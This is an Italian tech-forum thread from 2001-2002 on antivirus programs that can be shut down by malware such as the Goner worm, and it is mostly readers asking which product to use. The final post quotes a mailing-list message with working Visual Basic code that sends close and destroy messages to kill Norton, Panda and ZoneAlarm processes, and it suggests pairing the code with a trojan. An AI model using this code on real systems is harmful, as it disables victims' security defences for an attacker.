Condividi:        

Sicurezza Antivirus

Hai problemi con i file Zip, vuoi formattare l'HD, non sai come funziona FireFox? O magari ti serve proprio quel programmino di cui non ricordi il nome! Ecco il forum dove poter risolvere i tuoi problemi.

Moderatori: Dylan666, hydra, gahan

Postdi piorio » 11/12/01 05:14

Salve a tutti,
dopo l'infezione del 4 Dicembre di Goner, un virus che ha comportamenti da retrovirus (ovvero attacca i principali software di antivirus e firewall), si parla di sicurezza degli antivirus che non dovrebbero disabilitarsi mai, in alcun momento!
Questo problema lo avevo già espresso sui vari newsgroup realizzando un exploit a puro scopo informativo per porre rimedio a questa situazione.
In particolare la tecnica da me usata è molto diversa da quella di un semplice process killer (come Goner), ma usa un'API di Windows per notificare agli antivirus lo spegnimento (fasullo) del sistema.
Tale tecnica permette di disabilitare antivirus come Panda che utilizzano una doppia protezione (VxD statico + eseguibile) cosa che invece non riesce a fare Goner.
Tutto questo in data 25 Novembre.
Il 30 Dicembre Kaspersky (di AVP antivirus) rilascia una patch riconoscendo il mio exploit come ",Win32.piorio",.
Importante è dire che le altre case produttrici nulla hanno fatto per porre rimedio!
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Sponsor
 

Postdi Triumph Of Steel » 11/12/01 16:24

Io AVP lo uso da molto tempo, e l'ho sempre consigliato...
secondo me è uno dei migliori.. e forse anche quello che appesantisce meno il sistema.. a differenza di altri (leggi Norton :D)
Avatar utente
Triumph Of Steel
Moderatore
 
Post: 7852
Iscritto il: 22/08/01 01:00

Postdi rayden » 11/12/01 19:46

io uso f-secure e sono curioso di vedere se fà lo stesso sulla mia macchina...
Le uniche limitazioni che abbiamo sono quelle che ci poniamo da soli...
http://www.lightingandservices.com
http://www.lightingandservices.com/phoenix
rayden
Utente Senior
 
Post: 881
Iscritto il: 07/08/01 01:00

Postdi piorio » 12/12/01 00:54

Credo anche io che siano due ottimi prodotti, io specialmente preferisco AVP.
La bontà è indiscussa, comunque ci sono delle pecche piuttosto strane, degli errori di distrazione che ne compromettono l'efficacia.
Credo che tali problemi possano definirsi degli ",errori di gioventù", ma non possano essere giustificati in alcuna maniera in prodotti che sono sul mercato da diversi anni già in ambiente DOS
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Postdi oldcarlo » 17/12/01 16:12

qualcuno sa dirmi come si comporta pccillin in questo caso Mi funziona benissimo, e ho Zone Alarm come firewall. Questo retrovirus li disattiva? O devo contattare trend? Grazie, carlo gualtieri
oldcarlo
Newbie
 
Post: 1
Iscritto il: 12/10/01 01:00
Località: Roma

Postdi piorio » 18/12/01 05:16

Ciao,
a proposito di Pc-cillin non ti posso dire niente perchè non l'ho testato.
Norton Antivirus e InoculateIT invece ne sono immuni.
Se puoi pazientare qualche giorno ti faccio sapere.
Volevo comunque farti notare che la mia utility è stata sottoposta a test commissionati dal portale About.com ed hanno riscontrato problemi anche con altri antivirus, ma a me non hanno detto quali.
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Postdi dado » 18/12/01 06:08

In data 17/12/01 22:16, piorio ha scritto:

Norton Antivirus e InoculateIT invece ne sono immuni.



Intendi dire quindi che aggiornandolo Norton riconosce il Goner?

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Postdi piorio » 18/12/01 06:17

Ciao dado,
no mi riferivo ad un exploit da me programmato.
Comunque credo che ormai per Goner ci siano molti update e non sia un problema rimuoverlo.
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Postdi Pantagru » 02/01/02 18:53

Proprio mentere leggevo le vostre risposte su un altro argomento (Go in.exe) ho ricevuto da mio fratello un email con virus.
Sono andato da lui, ho installato il PCcilling e l'ho aggiornato. Purtroppo non ha individuato in alcun modo il virus.
Scusate le domande da poco competente, ma sbaglio o questi antivirus
- non individuano i virus negli attachment PRIMA che si scatenino
- non individuano i virus DOPO che si sono scatenati
- individuano il virus solo nel momento in cui questo viene attivato?

Si potrebbe disabilitare quel virus manualmente, ma il problema è la diagnosi.
Ha preso un brano da un file di testo, ha allegato una GIF più il virus (in questo caso un COLORE.BAT) e l'ha mandato ad alcuni indirizzi in rubrica. Inoltre forse sbarra l'accesso a mcafee.com
Pantagru
Utente Junior
 
Post: 22
Iscritto il: 01/01/02 01:00
Località: Milano

Postdi radius43 » 03/01/02 03:04

x PIORIO
questa storia farebbe rabbrividire se non fosse che si parla di virus informatici...
quelli veri..non tutti ..usano tecniche simili x entrare nelle difese umane:simulano proteine del corpo umano o si legano a proteine su siti non visibili!
detto questo passo alla mia richiesta:cosa dovrei fare avendo pc-cillin 2000 x evitare questi problemi????
dovrei inviare una mail al servizio di assistenza e dire cosa????
grazie x l'eventuale supporto tecnico...
Lorenzo
combatti per tutto quello in cui credi
credi in tutto quello per cui combatti
Avatar utente
radius43
Utente Senior
 
Post: 1161
Iscritto il: 27/08/01 01:00
Località: BARI

Postdi piorio » 04/01/02 01:38

X radius:
Per prima cosa devo dirti che non ho effettuato il test con Pc-cillin.
Il problema che ho messo in luce, però, non è stato affatto risolto nemmeno da Kaspersky.
Infatti hanno rilasciato l'update che individua il mio exploit, ma già se il codice lo ricompilo sotto Vb, per esempio, già non viene riconosciuto!!
Se usi Windows 98/Millenniumm ti consiglio vivamente di utilizzare InoculateIT che utilizza un meccanismo di caricamento statico che non può essere in alcuna maniera disabilitato.
Per gli altri antivirus non so proprio cosa dire.
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Postdi radius43 » 04/01/02 03:40

x PIORIO PAOLO

inoculate lo trovo come demo....free...o in prova?
se volessi uno gratuito discretamente efficace cosa mi consigli?
in alternativa se inoculate è demo o in prova trovo qualcosa in giro x renderlo full?
ciao
Lorenzo
combatti per tutto quello in cui credi
credi in tutto quello per cui combatti
Avatar utente
radius43
Utente Senior
 
Post: 1161
Iscritto il: 27/08/01 01:00
Località: BARI

Postdi piorio » 04/01/02 06:58

InoculateIt dovrebbe avere una licenza completa per privati tanto che io tempo fa lo installai da qualche rivista in edicola.
http://ca.com/etrust/downloads/inoculat ... it_reg.htm
Il sito dice che la versione è una trial completa, ma non so che dirti.
Prova e poi ci fai sapere.
piorio
Utente Junior
 
Post: 19
Iscritto il: 01/12/01 01:00

Postdi dado » 05/01/02 00:48

X Radius: vai qui e lo trovi freeware.

http://www.hwfiles.it/dett/792.html

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Postdi cds13 » 10/02/02 23:39

Incredibile, il freeware è più affidabile!
Uso INOCULATE da molto tempo e devo dire che è proprio ottimo.
Ho provato anche AVIR e mi è sembrato ottimo.
Mi capita di ricevere per posta qualcosa come 20 virus al mese (per lo più sircam ed hybris) e li conservo per vedere come l' antivirus li "pesca"
e questi due lavoravano alla grande!
E-safe desktop (aggiornato) non pescava quasi nulla.
F-prot per DOS mi becca pure i back orifices!
E' da qualche tempo che uso solo freeware, potrebbe essere una politica...
cds13
Utente Junior
 
Post: 93
Iscritto il: 29/01/02 01:00
Località: Bari

Postdi Rhost » 18/02/02 18:58

Mi permetto di incollarvi una mail arrivata in sicurezza.org che riguarda l'argomento appena discusso:
Le case produttrici di AV hanno ritenuto questo bug irrisorio... tranne AVP
che ha provveduto a rilasciare una patch. Per curiosità ho scritto due righe
di codice in VB utilizzando l'API in questione... il codice è il seguente :

--
Const WM_CLOSE = &H10

Private Declare Function FindWindowA Lib "user32" _
(ByVal lpClassName As Any, ByVal lpWindowName As Any) As Integer

Private Declare Function SendMessageA Lib "user32" _
(ByVal hWnd As Integer, ByVal wMsg As Integer, _
ByVal wParam As Integer, lParam As Any) As Long

Private Function Killer(hWnd&)
Dim Res&
Res = SendMessageA(hWnd, WM_CLOSE, 0, 0)
Res = SendMessageA(hWnd, WM_DESTROY, 0, 0)
End Function

Private Sub Form_Load()
Dim hWnd&
hWnd = FindWindowA(vbNullString, "Navapw32")
Killer (hWnd)
hWnd = FindWindowA(vbNullString, "Panda Antivirus 6.0 Platinum")
Killer (hWnd)
End Sub

--

... Non fate caso ai nomi delle funzioni mi sono lasciato trasportare =)
ho aggiunto una piccolezza rispetto ad altro codice che ho letto, che è
"FindWindowA" semplicemente va a ricercare i parametri dell'applicazione da
"contattare" in base al nome della stessa...

Cosa accade... semplicemente si fa credere all'antivirus che windows sta per
terminare la sessione e quindi gli si chiede ( SendMessageA ) gentilmente di
andare a fare... insomma di tornare da dove è venuto =)

La cosa carina è che lo stesso accade con i firewall (ho testato solo
ZoneAlarm).. lo si puo testare aggiungendo nel Form_Load :

hWnd = FindWindowA(vbNullString, "Zonealarm")
Killer (hWnd)

L'ultima versione di panda è ancora "vulnerabile", mentre norton ( anche
avendo ritenuto tutto ciò irrisorio ) nell'ultima versione dopo aver
effettuato l'update ciò non accade...

altri AV sono risultati vulnerabili (non testati da me personalmente) come :

AVP
F-Prot
McAfee
Pc Cillin 2002 NT Version

lascio a voi le considerazioni... anche se io credo che il problema abbia
una certa rilevanza, dato che con qualche artificio magari si puo collegare
il tutto ad un trojan di vecchio stampo, e quindi dargli la possibilità di
disattivare l'AV e magari anche il firewall giusto per il tempo che serve
all'attacker di fare cio che vuole...
insomma potrebbe essere un modo per dar sfogo alla fantasia =)

Fatemi sapere cosa ne pensate..

bye
-NeM <--- autore della mail
***********************************
Potete prenderne spunto per fare i vs test..
Nel caso avessi creato problemi a qualkuno con questo post, abbia la cortesia di segnalarlo..
ByEz Rhost.
Rhost
Utente Junior
 
Post: 26
Iscritto il: 08/11/01 01:00


Torna a Software Windows


Topic correlati a "Sicurezza Antivirus":


Chi c’è in linea

Visitano il forum: Nessuno e 70 ospiti

cron